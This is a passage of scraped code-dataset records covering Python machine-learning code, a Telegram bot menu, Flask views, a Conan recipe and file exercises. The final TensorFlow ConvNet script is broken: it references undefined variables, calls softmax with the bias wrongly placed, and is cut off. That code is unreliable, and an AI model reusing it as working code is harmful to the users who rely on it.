gt_labels_3d=None,\n rescale=False):\n \"\"\"Test function without augmentaiton.\"\"\"\n \"\"\"Implemented only for batch size of one.\"\"\"\n points = [points]\n img_metas = [img_metas]\n fv = self.pts_to_fv(points, img_metas) # list B x (5, h, w)\n fv = self.resize_and_pad(fv, img_metas) # (B, 5, h', w')\n valid_coords = self.get_valid_coords(fv)\n fv_feats, img_feats = self.extract_feat(fv, imgs, img_metas)\n feats = self.fusion(fv_feats, img_feats, self.fusion_mode)\n pts_feats = self.filter_valid_feats(feats, valid_coords)\n outs = self.bbox_head(pts_feats)\n bbox_list = self.bbox_head.get_bboxes(*outs,\n img_metas,\n valid_coords,\n gt_bboxes_3d,\n gt_labels_3d,\n rescale=rescale)\n bbox_results = [\n bbox3d2result(bboxes, scores, labels)\n for bboxes, scores, labels in bbox_list\n ]\n\n return bbox_results\n\n def aug_test(self, points, img_metas, imgs=None, rescale=False):\n \"\"\"Test function with augmentaiton.\"\"\"\n feats = self.extract_feats(points, img_metas)\n\n # only support aug_test for one sample\n aug_bboxes = []\n for x, img_meta in zip(feats, img_metas):\n outs = self.bbox_head(x)\n bbox_list = self.bbox_head.get_bboxes(\n *outs, img_meta, rescale=rescale)\n bbox_list = [\n dict(boxes_3d=bboxes, scores_3d=scores, labels_3d=labels)\n for bboxes, scores, labels in bbox_list\n ]\n aug_bboxes.append(bbox_list[0])\n\n # after merging, bboxes will be rescaled to the original image size\n merged_bboxes = merge_aug_bboxes_3d(aug_bboxes, img_metas,\n self.bbox_head.test_cfg)\n\n return [merged_bboxes]\n","sub_path":"mmdet3d/models/detectors/fvnet.py","file_name":"fvnet.py","file_ext":"py","file_size_in_byte":12164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23086388","text":"from Evie import CMD_LIST, CMD_HELP, xbot\nimport io\nimport re\nfrom math import ceil\n\nfrom telethon import custom, events, Button\n\nfrom Evie.events import register\n\nfrom telethon import types\nfrom telethon.tl import functions\n\nfrom pymongo import MongoClient\nfrom Evie import MONGO_DB_URI\n\nclient = MongoClient()\nclient = MongoClient(MONGO_DB_URI)\ndb = client[\"evie\"]\npagenumber = db.pagenumber\n\n\n\nabout = \"**About Me**\\n\\nMy name is Evie, A group management bot who can take care of your groups with automated regular admin actions!\\n\\n**My Software Version:** 2.0.1\\n**Telethon Version:** 1.21.1\\n\\n**My Developers:**\\n• @RoseLoverX\\n• @LegendX22\\n• @Proboyx\\n\\nUpdates Channel: [Click Here](t.me/lunabotnews)\\nSupport Chat: [Click Here](t.me/lunabotsupport)\\n\\nAnd finally thanks for Supporting me😘\"\nad_caption = \"Hey! I am Evie, here to help you manage your groups! I perform most of the admin functions and make your group automated!\\n\\nJoin @Lunabotnews for updates.\\n@Lunabotsupport for help and support\\n\\nYou can checkout more about me via following buttons.\"\npm_caption = \"Hey there! My name is Evie - I'm a Telethon based Bot Made to help you manage your groups!\\n\\nHit /help to find out more about me and unleash my full potential.\\n\\n\"\npmt = \"Hello there! I'm Evie\\nI'm a Telethon Based group management bot\\n with a Much More! Have a look\\nat the following for an idea of some of \\nthe things I can help you with.\\n\\nMain commands available:\\n/start : Starts me, can be used to check i'm alive or not.\\n/help : PM's you this message.\\nExplore My Commands🙃.\"\n@register(pattern=\"^/start$\")\nasync def start(event):\n\n if not event.is_group:\n await xbot.send_message(\n event.chat_id,\n pm_caption,\n buttons=[\n [\n Button.inline(\"Advanced\", data=\"soon\"),\n Button.inline(\"Commands\", data=\"help_menu\"),\n ],\n [\n Button.url(\n \"Add Me To Your Group!\", \"t.me/missevie_robot?startgroup=true\"\n ),\n ],\n ],\n )\n else:\n await event.reply(\"Heya Luna Here!,\\nHow Can I Help Ya.\")\n\n@xbot.on(events.CallbackQuery(pattern=r\"reopen_again\"))\nasync def reopen_again(event):\n if not event.is_group:\n await event.edit(\n pm_caption,\n buttons=[\n [\n Button.inline(\"Advanced\", data=\"soon\"),\n Button.inline(\"Commands\", data=\"help_menu\"),\n ],\n [\n Button.url(\n \"Add Me To Your Group!\", \"t.me/missevie_robot?startgroup=true\"\n ),\n ],\n ],\n )\n else:\n pass\n\n\n@register(pattern=\"^/help$\")\nasync def help(event):\n if not event.is_group:\n buttons = paginate_help(event, 0, CMD_LIST, \"helpme\")\n await event.reply(pmt, buttons=buttons)\n else:\n await event.reply(\n \"Contact me in PM for help!\",\n buttons=[[Button.url(\"Click me for help!\", \"t.me/missevie_robot?start=help\")]],\n )\n\n@xbot.on(events.CallbackQuery(pattern=r\"help_menu\"))\nasync def help_menu(event):\n buttons = paginate_help(event, 0, CMD_LIST, \"helpme\")\n await event.edit(pmt, buttons=buttons)\n\n@xbot.on(events.CallbackQuery(pattern=r\"soon\"))\nasync def soon(event):\n buttons=[[Button.inline(\"About Me\", data=\"about_me\"), Button.inline(\"Commands\", data=\"help_menu\"),],[Button.inline(\"Go Back\", data=\"reopen_again\"),],]\n await event.edit(ad_caption, buttons=buttons)\n\n@xbot.on(events.CallbackQuery(pattern=r\"about_me\"))\nasync def soon(event):\n buttons=[Button.inline(\"Go Back\", data=\"soon\"),]\n await event.edit(about, buttons=buttons)\n\n@xbot.on(events.callbackquery.CallbackQuery(data=re.compile(b\"us_plugin_(.*)\")))\nasync def on_plug_in_callback_query_handler(event):\n plugin_name = event.data_match.group(1).decode(\"UTF-8\")\n help_string = \"\"\n # By @RoseLoverX\n\n for i in CMD_LIST[plugin_name]:\n plugin = plugin_name.replace(\"_\", \" \")\n emoji = plugin_name.split(\"_\")[0]\n output = str(CMD_HELP[plugin][1])\n help_string = f\"Here is the help for **{emoji}**:\\n\" + output\n\n if help_string is None:\n pass # stuck on click\n else:\n reply_pop_up_alert = help_string\n try:\n await event.edit(\n reply_pop_up_alert, buttons=[\n [Button.inline(\"Back\", data=\"go_back\")]]\n )\n except BaseException:\n pass\n\n@xbot.on(events.CallbackQuery(pattern=r\"go_back\"))\nasync def go_back(event):\n c = pagenumber.find_one({\"id\": event.sender_id})\n number = c[\"page\"]\n # print (number)\n buttons = paginate_help(event, number, CMD_LIST, \"helpme\")\n await event.edit(pm_caption, buttons=buttons)\n\ndef get_page(id):\n return pagenumber.find_one({\"id\": id})\n\n\ndef paginate_help(event, page_number, loaded_plugins, prefix):\n number_of_rows = 15\n number_of_cols = 3\n\n to_check = get_page(id=event.sender_id)\n\n if not to_check:\n pagenumber.insert_one({\"id\": event.sender_id, \"page\": page_number})\n\n else:\n pagenumber.update_one(\n {\n \"_id\": to_check[\"_id\"],\n \"id\": to_check[\"id\"],\n \"page\": to_check[\"page\"],\n },\n {\"$set\": {\"page\": page_number}},\n )\n\n helpable_plugins = []\n for p in loaded_plugins:\n if not p.startswith(\"_\"):\n helpable_plugins.append(p)\n helpable_plugins = sorted(helpable_plugins)\n modules = [\n custom.Button.inline(\n \"{}\".format(x.replace(\"_\", \" \")), data=\"us_plugin_{}\".format(x)\n )\n for x in helpable_plugins\n ]\n pairs = list(zip(modules[::number_of_cols], modules[1::number_of_cols], modules[2::number_of_cols]))\n if len(modules) % number_of_cols == 1:\n pairs.append((modules[-1],))\n max_num_pages = ceil(len(pairs) / number_of_rows)\n modulo_page = page_number % max_num_pages\n pairs = pairs[\n modulo_page * number_of_rows: number_of_rows * (modulo_page + 1)\n ] + [\n (\n custom.Button.inline(\n \"Go Back\", data=\"reopen_again\"\n ),\n custom.Button.inline(\n \"Advanced Commands\", data=\"fun_help\"\n ),\n )\n ]\n return pairs\n\ndef nood_page(event, page_number, loaded_plugins, prefix):\n number_of_rows = 15\n number_of_cols = 3\n\n to_check = get_page(id=event.sender_id)\n\n if not to_check:\n pagenumber.insert_one({\"id\": event.sender_id, \"page\": page_number})\n\n else:\n pagenumber.update_one(\n {\n \"_id\": to_check[\"_id\"],\n \"id\": to_check[\"id\"],\n \"page\": to_check[\"page\"],\n },\n {\"$set\": {\"page\": page_number}},\n )\n\n helpable_plugins = []\n for p in loaded_plugins:\n if not p.startswith(\"_\"):\n helpable_plugins.append(p)\n helpable_plugins = sorted(helpable_plugins)\n modules = [\n custom.Button.inline(\n \"{}\".format(x.replace(\"_\", \" \")), data=\"help_plugin_{}\".format(x)\n )\n for x in helpable_plugins\n ]\n pairs = list(zip(modules[::number_of_cols], modules[1::number_of_cols], modules[2::number_of_cols]))\n if len(modules) % number_of_cols == 1:\n pairs.append((modules[-1],))\n max_num_pages = ceil(len(pairs) / number_of_rows)\n modulo_page = page_number % max_num_pages\n pairs = pairs[\n modulo_page * number_of_rows: number_of_rows * (modulo_page + 1)\n ] + [\n (\n custom.Button.inline(\n \"Go Back\", data=\"help_menu\"\n ),\n )\n ]\n return pairs\n","sub_path":"Evie/modules/_menu.py","file_name":"_menu.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"294549847","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route('/result')\ndef result():\n\tdict = {'math':95, 'physics':67, 'chem': 70}\n\treturn render_template('result.html', result = dict)\n\nif __name__ == '__main__':\n\tapp.run(port = 5005, debug = True)\n","sub_path":"app/temp_result.py","file_name":"temp_result.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"601533525","text":"import os\nfrom conans import ConanFile, CMake, tools\n\n\nclass TaoCPPPEGTLConan(ConanFile):\n name = \"taocpp-pegtl\"\n license = \"MIT\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/taocpp/pegtl\"\n description = \"Parsing Expression Grammar Template Library\"\n topics = (\"peg\", \"header-only\", \"cpp\", \"parsing\", \"cpp17\", \"cpp11\", \"grammar\")\n no_copy_source = True\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = \"PEGTL-\" + self.version\n os.rename(extracted_dir, self._source_subfolder)\n\n def package(self):\n cmake = CMake(self)\n cmake.definitions[\"PEGTL_BUILD_TESTS\"] = False\n cmake.definitions[\"PEGTL_BUILD_EXAMPLES\"] = False\n cmake.definitions[\"PEGTL_INSTALL_DOC_DIR\"] = \"licenses\"\n cmake.configure(source_folder=self._source_subfolder)\n cmake.install()\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_id(self):\n self.info.header_only()\n","sub_path":"recipes/taocpp-pegtl/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199134692","text":"# coding: utf-8\nfrom __future__ import print_function\nfrom keras.layers.recurrent import GRU\nfrom tensorflow.python.lib.io.file_io import file_exists\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nimport numpy as np\nimport sys\nfrom time import sleep\nimport psutil\nfrom keras.layers.wrappers import TimeDistributed\n####\n# minesh.mathew@gmail.com\n# modified version of text generation example in keras; trained in a many-to-many fashion using a time distributed dense layer\n####\n'''\nw568w 1278297578@qq.com\n添加中文注释,修改为Keras 2 API\nAdd code comments in Chinese,change the code to Keras 2 API and replace LSTM with GRU.\n'''\n\n\n\ndef sample(preds, temperature=1.0):\n # helper function to sample an index from a probability array\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)\n# 测试\n# 生成结果,使用max法,易出现重复,考虑使用sample\n# testing\n# now you use the trained model to generate text.\ndef test(seed_string, length):\n print ('The generated text is')\n sys.stdout.write(seed_string)\n for i in range(length):\n x = np.zeros((1, len(seed_string), len(chars)))\n for t, char in enumerate(seed_string):\n x[0, t, char_indices[char]] = 1.\n preds = model.predict(x, verbose=0)[0]\n #next_index = np.argmax(preds[len(seed_string) - 1])\n next_index = sample(preds[len(seed_string) - 1])\n next_char = indices_char[next_index]\n seed_string = seed_string + next_char\n \n sys.stdout.write(next_char)\n\n\n# 打开文件\n# Read file\ntext = open('./textdatasets/tiny_input.txt').read().lower()\nprint('text length:', len(text))\n# 处理中文编码问题\n# deal with encoding problem when processing non-ascii chars.\ntext = unicode(text, 'utf-8')\n# 取出字符集合(重复字符只包含一次),作为词字典\n# put every word into a set,which's used as a word dictionary\nchars = sorted(list(set(text)))\nprint('total chars:', len(chars))\n# 生成字典,获得字符在chars中的位置\n# Eg. char_indices['c'] will return the index of 'c' in chars array\nchar_indices = dict((c, i) for i, c in enumerate(chars))\n# 生成字典,获得下标在chars中的字符\n# Eg. indices_char[0] will return the first element in chars array\nindices_char = dict((i, c) for i, c in enumerate(chars))\n\n# 40个40个字符地分割文本为sentences,next_chars为sentences向后移动一位文本\n# 如:文本为ABCDE,maxlen=3则\n# sentences=[[A,B,C],[B,C,D]]\n# nextchars=[[B,C,D],[C,D,E]]\n\n# split the text into sequences of length=maxlen\n# input is a sequence of 20 chars and target is also a sequence of 40 chars shifted by one position\n# Eg. if you maxlen=3 and the text is abcdefghi, your input ---> target pairs will be\n# [a,b,c] --> [b,c,d], [b,c,d]--->[c,d,e]....and so on\nmaxlen = 20\nsentences = []\nnext_chars = []\nfor i in range(0, len(text) - maxlen + 1, 1):\n sentences.append(text[i: i + maxlen]) \n next_chars.append(text[i + 1:i + 1 + maxlen]) \nprint('sequences length:', len(sentences))\n# 向量化\n# Vectorize the data\nprint()\nprint('Vectorization...')\n#输出两个巨型矩阵的大小及可用内存\n#print the size of these two huge martixs\nprint('array size:', float((len(sentences) * maxlen * len(chars))) * 2 / 1024 / 1024, 'MB')\ninfo = psutil.virtual_memory()\nprint('free memory:', float(info.available / (1024 ** 2)), 'MB')\n# 输入格式为三维向量,分别代表(输入组量,step长度,每个step的输入长度)\n# 这里使用one hot向量,x[0,0,0]=1,表示第1句话的第1个字符是chars[0]\n# Input is a 3-dim vector,shape means (data_size,step_length,input_length_at_each_step)\n# X and Y are one-hot vectors,\n# eg. x[0,0,0]=1 means the first char of the first sentence is char[0]\nX = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool)\ny = np.zeros((len(sentences), maxlen, len(chars)), dtype=np.bool) \nfor i, sentence in enumerate(sentences):\n for t, char in enumerate(sentence):\n X[i, t, char_indices[char]] = 1\n\nfor i, sentence in enumerate(next_chars):\n for t, char in enumerate(sentence):\n y[i, t, char_indices[char]] = 1\n\nprint ('vetorization completed')\n# 建构模型:GRU+20%丢弃率+时间步的Full-connect网络\n# build the model: 1 stacked GRU+20% DropOut+Time Distributed Full-Connected Dense\nprint('Build model...')\nmodel = Sequential()\n# 指定了input长度\n# Specify the input length\nmodel.add(GRU(512, input_shape=(None, len(chars)), return_sequences=True)) \n# model.add(LSTM(512, return_sequences=True)) \nmodel.add(Dropout(0.2))\n# TimeDistributed就是在每个时间步上均执行一次Dense,即many to many,这里起修饰LSTM层输出结果作用\n# Dense(len(chars))代表输出的第三个维度为chars长度\nmodel.add(TimeDistributed(Dense(len(chars))))\n# 定义激活层\nmodel.add(Activation('softmax'))\n# rmsprop训练RNN很合适\n# rmsprop is faster than other optimizers when training a RNN\nmodel.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n\nprint (model.summary())\n# 载入保存的参数\n# load saved weights(if exist)\nif file_exists('Karpathy_LSTM_weights.h5'):\n model.load_weights('Karpathy_LSTM_weights.h5')\n# 训练\n# Training\nfor iteration in range(1, 5):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n # 拟合模型,128个batch为一组\n # train the model,batch size=128,epochs=1\n history = model.fit(X, y, batch_size=128, epochs=1)\n # 必须在IPython上延时0.1s,否则会在save_weights时出现I/O error\n # Must sleep on IPython,otherwise I/O error will be thrown when calling save_weights()\n sleep(0.1) # https://github.com/fchollet/keras/issues/2110\n model.save_weights('Karpathy_LSTM_weights.h5', overwrite=True)\ntest(u\"我\",1000)\n","sub_path":"char_rnn_of_karpathy_keras.py","file_name":"char_rnn_of_karpathy_keras.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"555878805","text":"''' Views for various authentication schemes. '''\n\nfrom datetime import datetime\n\nfrom flask import abort, g, jsonify, request\nfrom flask.ext.classy import FlaskView, route\nfrom werkzeug.exceptions import BadRequest, Unauthorized\n\nfrom app.authorization import login_required\nfrom model import User\n\nclass UserView(FlaskView):\n ''' Information about users. '''\n\n @route('/whoami')\n @login_required\n def whoami(self):\n ''' Return information about the current logged in user. '''\n\n return jsonify(\n id=g.user.id,\n username=g.user.username,\n image_url=g.user.image_url,\n is_admin=g.user.is_admin\n )\n\n @route('/whoami', methods=('POST',))\n @login_required\n def change_username(self):\n '''\n Allow a user to change his/her own username.\n\n A username can only be changed within 15 minutes after creating an\n account. This is done so that users can select their own username\n after creating an account but cannot freely change their username\n after establishing a reputation on this site.\n '''\n\n CHANGE_TIME = 15\n\n user_account_age = datetime.today() - g.user.added\n\n if user_account_age.seconds > CHANGE_TIME * 60:\n message = 'You are only allowed to change your username within' \\\n ' %d minutes of creating your account.' % CHANGE_TIME,\n raise Unauthorized(message)\n\n request_json = request.get_json()\n g.user.username = request_json['username']\n g.db.commit()\n\n return jsonify(message='Username changed successfully.')\n","sub_path":"lib/app/views/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260149001","text":"# Object detection project, library\r\nimport itertools\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\n\r\ndef data_structure_check(data_, photo_dim_, categories_):\r\n \"\"\"\r\n Parameters:\r\n data_: the 4-dimensional list containing the raw data\r\n photo_dim_: original photo dimensions\r\n categories_: list of category names\r\n Method:\r\n check for consistency in the data structure\r\n Return:\r\n square size N\r\n \"\"\"\r\n # check for the correct format of the matrix\r\n if np.ndim(np.array(data_, dtype=object)) != 4:\r\n raise ValueError(\"Data structure has not the correct format\")\r\n (par_Bp, par_Ap, par_M, par_K) = np.shape(data_)\r\n par_K -= 5\r\n\r\n # check for consistency on the K parameter\r\n if par_K != len(categories_):\r\n raise ValueError(\"K parameter is inconsistent\")\r\n\r\n # check for consistency on N\r\n if photo_dim_[0] / photo_dim_[1] != par_Ap / par_Bp:\r\n raise ValueError(\"Photo dimensions are inconsistent with data structure\")\r\n\r\n return photo_dim_[0] / par_Ap\r\n\r\n\r\ndef create_dict(categories_):\r\n cat_dict = {}\r\n for ind, cat in enumerate(categories_):\r\n cat_dict[ind + 1] = cat\r\n return cat_dict\r\n\r\n\r\n# Step 1: function 1\r\ndef determine_class(data_):\r\n \"\"\"\r\n Parameters:\r\n data_: the 4-dimensional list containing the raw data\r\n Return:\r\n A 3-dimensional list with the probability, for each NxN square, of containing an object of a specific category\r\n (chosen as the one giving the highest probability)\r\n \"\"\"\r\n (par_Bp, par_Ap, par_M, par_K) = np.shape(data_)\r\n for b, a in itertools.product(range(par_Bp), range(par_Ap)):\r\n probability = 0\r\n box = []\r\n index = 0\r\n for element in data_[b][a]:\r\n for i, x in enumerate(element[5:]):\r\n if (element[0] * x) > probability:\r\n probability = element[0] * x\r\n index = i\r\n box = element\r\n if not box:\r\n box = data_[b][a][0]\r\n # if -for any reason- there is a square with only boxes of probability = 0, this allows the correct\r\n # functioning of the code\r\n data_[b][a] = [round(probability, 2)] + box[1:5] + [index + 1]\r\n return data_\r\n\r\n\r\n# Step 1: function 2\r\ndef coordinates_conversion(data_, n_size_):\r\n \"\"\"\r\n Parameters:\r\n data_: The 3-dimensional list containing information about one box per square and coordinated expressed\r\n in format 1\r\n n_size_: Size of a single square N\r\n Return:\r\n A 3-dimensional list like the input parameter \"data_\" with coordinates converted in format 2\r\n \"\"\"\r\n (par_Bp, par_Ap, dummy) = np.shape(data_)\r\n for b, a in itertools.product(range(par_Bp), range(par_Ap)):\r\n data_[b][a] = [data_[b][a][0]] + \\\r\n [a * n_size_ + data_[b][a][1] - data_[b][a][3] / 2] + \\\r\n [b * n_size_ + data_[b][a][2] - data_[b][a][4] / 2] + \\\r\n [a * n_size_ + data_[b][a][1] + data_[b][a][3] / 2] + \\\r\n [b * n_size_ + data_[b][a][2] + data_[b][a][4] / 2] + \\\r\n [data_[b][a][-1]]\r\n return data_\r\n\r\n\r\n# Step 2: function 3\r\ndef filtering(data_, thresh_=0.5):\r\n \"\"\"\r\n Parameters:\r\n data_: The 3-dimensional list containing information about one box per square and coordinated expressed\r\n in format 2\r\n thresh_: Threshold parameter with default value of 0.5\r\n Return:\r\n A subset of input boxes in form of a 2-dimensional array containing only those with probability greater\r\n than or equal the threshold\r\n \"\"\"\r\n filtered_data = []\r\n (par_Bp, par_Ap, par_K) = np.shape(data_)\r\n for element in np.reshape(data_, (par_Bp*par_Ap, par_K)):\r\n if element[0] >= thresh_:\r\n filtered_data.append(element.tolist())\r\n return filtered_data\r\n\r\n\r\n# Step 3: function 4\r\ndef iou_calculation(box1_, box2_):\r\n \"\"\"\r\n Parameters:\r\n box1_: List of parameter describing a single box in format 2\r\n box2_: List of parameter describing a single box in format 2\r\n Return:\r\n Intersection-over-union value of the two rectangles\r\n \"\"\"\r\n x_min = max(box1_[1], box2_[1])\r\n y_min = max(box1_[2], box2_[2])\r\n x_max = min(box1_[3], box2_[3])\r\n y_max = min(box1_[4], box2_[4])\r\n if (x_min > x_max) or (y_min > y_max):\r\n return 0\r\n else:\r\n i_area = (x_max - x_min) * (y_max - y_min)\r\n u_area = (box1_[3] - box1_[1]) * (box1_[4] - box1_[2]) + \\\r\n (box2_[3] - box2_[1]) * (box2_[4] - box2_[2]) + \\\r\n - i_area\r\n return i_area / u_area\r\n\r\n\r\n# Step 3: function 5\r\ndef non_max_suppression(data_, thresh_=0.5):\r\n \"\"\"\r\n Parameters:\r\n data_: The 3-dimensional list containing information about one box per square and coordinated expressed\r\n in format 2\r\n thresh_: Intersection-over-union threshold parameter with default value of 0.5\r\n Return:\r\n A subset of input boxes in form of a 2-dimensional array without overlapping boxes. Two boxes are considered\r\n to be overlapping if their intersection-over-union value is higher than thrsh_ input parameter\r\n \"\"\"\r\n sorted_data = sorted(data_, reverse=True, key=lambda x: x[0])\r\n for index, el1 in enumerate(sorted_data):\r\n if el1 in data_:\r\n for el2 in sorted_data[index+1:]:\r\n if el2 in data_ and iou_calculation(el1, el2) > thresh_:\r\n data_.remove(el2)\r\n return data_\r\n\r\n\r\ndef print_data(data_, cat_dict_):\r\n \"\"\"\r\n Parameters:\r\n data_: The 3-dimensional list containing information about one box per square and coordinated expressed\r\n in format 2\r\n cat_dict_: Dictionary of categories of detectable items\r\n Return:\r\n A list of strings containing information about each detected item, their category and position\r\n \"\"\"\r\n output_list = []\r\n for box in data_:\r\n output_str = cat_dict_[box[-1]].capitalize() + \\\r\n \" detected with probability \" + \\\r\n \"{0:.2f}\".format(box[0]) + \\\r\n \" at ((\" + str(int(box[1])) + \", \" + str(int(box[2])) + \"), \" +\\\r\n \"(\" + str(int(box[3])) + \", \" + str(int(box[4])) + \"))\"\r\n output_list.append(output_str)\r\n return output_list\r\n\r\n\r\n# Function 6\r\ndef object_detection(photo_dim, original_data, categories, iou_threshold=0.5, filtering_threshold=0.5):\r\n \"\"\"\r\n Parameters:\r\n photo_dim: Original photo dimensions\r\n original_data: A 4-dimensional list containing the raw data, will not be modified\r\n categories: List of categories of detectable objects\r\n iou_threshold: Intersection over union threshold value, with default value of 0.5\r\n filtering_threshold: Filtering threshold value, with default value of 0.5\r\n Return:\r\n A list of strings containing information about each detected item, their category and position\r\n \"\"\"\r\n\r\n # creating a copy to left original_data unmodified\r\n data = deepcopy(original_data)\r\n\r\n # checking data structure for anomalies and read data dimensions\r\n n_size = data_structure_check(data, photo_dim, categories)\r\n\r\n # creating a dictionary for categories\r\n cat_dict = create_dict(categories)\r\n\r\n # Step 1.a: class determination\r\n data = determine_class(data)\r\n # Step 1.b: coordinates conversion\r\n data = coordinates_conversion(data, n_size)\r\n\r\n # Step 2: filtering\r\n data = filtering(data, filtering_threshold)\r\n\r\n # Step 3: Non-max suppression\r\n data = non_max_suppression(data, iou_threshold)\r\n\r\n # Output: List of string stating category detected with given probability (.2f) at location (in format 2)\r\n output_list = print_data(data, cat_dict)\r\n\r\n return output_list\r\n","sub_path":"OD_lib.py","file_name":"OD_lib.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"191451515","text":"import os\n\n#1. Open the filenames.txt file with read-only access with the open() function\nfile_object0 = open('filenames.txt', 'r')\nprint(file_object0)\nfile_object0.close()\n\n#2. Print the name of the file and if it is open or closed using the .name and .closed properties\n\nprint(file_object0.name)\nprint(file_object0.closed)\n\n#3. Use a for loop to read all lines of filenames.txt into a list variable\nfile_object = open('filenames.txt', 'r')\nfile_list = []\n\nfor each in file_object:\n print(each)\n file_list.append(each)\n\n\n#4. Print out all the lines from the file from your variable\nprint('blagh', file_list)\n\n#5. Close the filenames.txt file and print if the file is open or closed\nfile_object.close()\nprint(file_object.closed)\n\n#6. Create a file using the open() function called secrets.txt\nfile_secrets = open('secrets.txt', 'w')\n\n#7. Write your own secrets to the file with the write() function\nfile_secrets.write('Don\\'t tell anybody about this... shhhhh!!!!')\n\n#8. Close the secrets.txt file using the close() method. DON'T FORGET!\nfile_secrets.close()\n\n#9. Print out the contents of the text file in your terminal to prove it worked\nfile_secrets_check = open('secrets.txt', 'r')\nprint(file_secrets_check)\n\nfile_test = []\nfor each in file_secrets_check:\n print(each)\n file_test.append(each)\n\nprint('confirm this works: ', file_test)\n\n#cat secrets.txt\nfile_secrets_check.close()\n\n#10. Open your secrets.txt file in append mode and write some more super secret info\nfile_secret_anew = open('secrets.txt', 'a')\nfile_secret_anew.write('\\nok this is the last straw')\n\nprint(file_secret_anew);\n\n#11. Close the secrets.txt file again using the close() function\nfile_secret_anew.close()\n\n#12. Rename the secrets.txt and make it a \"hidden\" file named .supersecret.txt using the os.rename() function\nos.rename('secrets.txt', '.supersecret.txt')\n\n#13. See if you can see the file in your file explorer\n\n\n#14. Create a list variable named file_names that contains a list of filenames\n\n#15. Use the writelines() function to append the filenames to the filenames.txt file\n\n#16. Delete the initial secrets.txt file now that you have a super secret hidden version\n\n#17. BOSS LEVEL: Use the input() function to accept user input of a filename to create and create that file.\n","sub_path":"exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"432397705","text":"# ConvNet\n\nfrom __future__ import print_function\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n\ndef compute_accuracy(v_xs, v_ys):\n global prediction\n y_pred = sess.run(prediction, feed_dict={xs: v_xs, keep_prob: 1})\n correct_prediction = tf.equal(tf.argmax(y_pred, 1), tf.argmax(v_ys, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n result = sess.run(accuracy, feed_dict={xs: v_xs, ys: v_ys, keep_prob: 1})\n return result\n\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\n\ndef conv2d(x, W):\n # stride [1, x_movement, y_movement, 1]\n # Must have strides[0] = strides[3] = 1\n # valid padding: shrinkage; same padding: bleeding -> same size\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\n\ndef max_pool_2x2(x):\n # stride [1, x_movement, y_movement, 1]\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\n\n# define placeholder for inputs to network\nxs = tf.placeholder(tf.float32, [None, 784]) # 28x28\nys = tf.placeholder(tf.float32, [None, 10])\nkeep_prob = tf.placeholder(tf.float32)\n\nx_image=tf.reshape(xs,[-1, 28, 28, 1]) # -1 regardless the sample size\nprint(x_image.shape)\n\n# conv1\nW_conv1 = weight_variable([5, 5, 1, 32]) # kernel/patch 5x5, in (thick) 1, out 32\nb_conv1 = bias_variable([32])\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1)+b_conv1) # output 28x28x32\nh_pool = max_pool_2x2(h_conv1) # output 14x14x32\n\n# conv2\nW_conv2 = weight_variable([5, 5, 32, 64]) # in 32, out 64\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2)+b_conv2) # out 14x14x64\nh_pool2 = max_pool_2x2(h_conv2) # out 7x7x64\n\n# flatten\nh_pool2_flat=tf.reshape(h_pool2, [-1, 7*7*64])\n\n# fc1\nW_fc1 = weight_variable([7*7*64, 1024]) \nb_fc1 = bias_variable([1024])\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1)+b_fc1)\nh_fc1_drop = tf.nn.dropout(h_fc1,keep_drop)\n\n# fc2\nW_fc2 = weight_variable([1024, 10])\nb_fc2 = bias_variable([10])\nprediction=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2), b_fc2)\n\n# the error between prediction and real data\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys * tf.log(prediction), reduction_indices=[1]))\ntrain_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy) # Adam requires smaller learning rate\n\nsess = tf.Session()\n\ninit = tf.global_variables_initializer()\nsess.run(init)\n\nfor i in range(1000):\n batch_xs, batch_ys = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={xs: 